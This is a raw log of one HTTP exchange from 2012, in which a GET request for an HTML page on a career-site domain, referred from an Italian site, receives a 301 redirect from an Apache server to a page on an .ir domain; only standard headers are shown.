GET /hmiq.html HTTP/1.1 Host: lovickdiversitycareer.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ferramentafaba.it/chiavi-porte-auto-legnano.htm	HTTP/1.1 301 Moved Permanently Content-Type: text/html Date: Fri, 09 Nov 2012 11:21:49 GMT Server: Apache Location: http://kgfx.ir/hmiq.htm Keep-Alive: timeout=2, max=100 Connection: Keep-Alive Transfer-Encoding: chunked